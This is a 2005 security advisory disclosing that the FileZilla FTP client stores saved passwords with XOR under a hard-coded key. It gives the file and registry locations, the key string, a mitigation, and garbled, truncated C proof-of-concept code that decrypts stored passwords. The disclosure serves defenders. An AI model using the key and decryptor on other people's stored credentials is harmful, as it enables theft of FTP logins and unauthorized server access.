-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Title: FileZilla weakly-encrypted password vulnerability Risk: HIGH Credits: pagvac (Adrian Pastor) Date found: 6th August, 2005 Homepage: www.ikwt.com www.adrianpv.com E-mail: m123303[ - at - ]richmond.ac.uk Background - ----------- FileZilla is the most active and most downloaded open source FTP/SFTP client (according to www.SourceForge.org at time of writing). Currently there is only a Windows version of this client. For some stats visit: http://sourceforge.net/top/mostactive.php?type=week http://sourceforge.net/top/toplist.php?type=downloads_week The project page can be found at: http://sourceforge.net/projects/filezilla/ This advisory plus PoC code and executable can be found in the following links: http://www.ikwt.com/projects/filezilla-weak-encryption-research.zip http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zi p Versions affected - ----------------- This vulnerability has been successfully tested on versions 2.2.14b and 2.2.15. However, it is suspected that most previous versions are also affected. Vulnerability summary - --------------------- - - FileZilla client stores password using weak XOR "encryption" - - The value of the cipher key is static (it never changes) and can be found in the source code Description of vulnerability - ---------------------------- FileZilla saves configuration settings in two different locations: - - in an XML file - - in the Windows registry The method used to save configuration settings depends on the preferences used by the user during the installation of FileZilla. Either way, all configuration settings are stored in cleartext, EXCEPT for the password. However, the password is stored using very weak XOR "encryption" which can be easily reversed. There exists a problem in the way the XOR encryption is implemented because the same cipher key is always used. This key is hard-coded, which means that anyone can analyze the source code of the application and find it. Of course, this wouldn't be so easy if FileZilla wasn't an open source application. Once the key is known, an attacker can use it to decrypt the password back to its cleartext form. Because the XOR cryptographic algorithm used is symmetric, the same key is used for both, encrypting and decrypting. As mentioned before, the rest of the configuration settings are all in cleartext. Some information that would be useful for an attacker includes hostname of the server to connect to, default port, and username. If successfully exploited, this vulnerability will allow an attacker to access FTP (or SFTP) servers with the privileges of the user whose configuration settings were stolen from. In practice, this vulnerability could be exploited after a machine has been compromised, or by fooling the user into executing malicious code. Such code could dump the configuration settings, decrypt the password/s and sends them all to the attacker. It is common to see many popular trojans out there that exploit weak encryption vulnerabilities of this type. These trojans dump the credentials of popular applications such as Internet Explorer, VNC or even dialup connections. FileZilla could be the next added application in the list of all those trojans with password-dumping features. This vulnerability is somehow similar to the one found by Conde Vampiro in VNC 3 back in 1999. It's similar because in both cases we find an open source application using a fixed cipher key to decrypt passwords. Thus, making trivial to find the key. For more information on Conde Vampiro's findings visit http://www.securiteam.com/securitynews/3P5QERFQ0Q.html Vulnerability details - --------------------- The XML configuration file is found at: %programfiles%\FileZilla\FileZilla.xml Where %programfiles% is the "program files" directory. This is usually "c:\program files" by default. The configuration settings are saved in the registry in: Hive: HKEY_CURRENT_USER Key: Software\FileZilla\Site Manager\[site_name]\ Where [site_name] is the name given to the connection by the user. The password is saved in the previous key as a value with the following properties: Value: Pass Type: REG_SZ (string terminated in NULL) The cipher key can be found in Crypt.cpp and its value is: "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ" Solution - -------- Choose "Use secure mode" during the installation (this disables FileZilla from saving passwords), lockdown your client machines where the FileZilla client is installed, or update to a patched version which fixes this issue (if available). PoC Code - -------- /* Filename: filezilla-pwdec.c Title: FileZilla Client - Weakly encrypted password exploit v0.01 Author: pagvac (Adrian Pastor) Date: 8th August, 2005 License: GPL email: m123303[-a-t-]richmond.ac.uk homepage: www.ikwt.com (In Knowledge We Trust) www.adrianpv.com Description: this tool asks the user for the "encrypted" password and computes the cleartext version of the password Other info: compile as a Win32 console application project in Visual C++ Copyright (C) 2005 pagvac (Adrian Pastor) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ //Includes #include #include #include #include //Macros #define MAX_SIZE 150 #define SLEEP_TIME 5000 //Global variable (cypher key) char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"; //PRE: decimal values representing ASCII chars, // every three digits becomes one ASCII char // e.g.: 042040063063 //POST: ASCII chars are copied back to buff[] // e.g.: *(?? // the length of the new string is returned int digit2char(char buff[]) { char tmp_buff[4], ascii_buff[MAX_SIZE]; unsigned int i=0, j=0, n=0, len=(strlen(buff)/3); for(i=0,j=0;i"); scanf("%s", cypher); if(strlen(cypher)%3==0) { len=decrypt(cypher); printf("cleartext password:"); for(i=0;i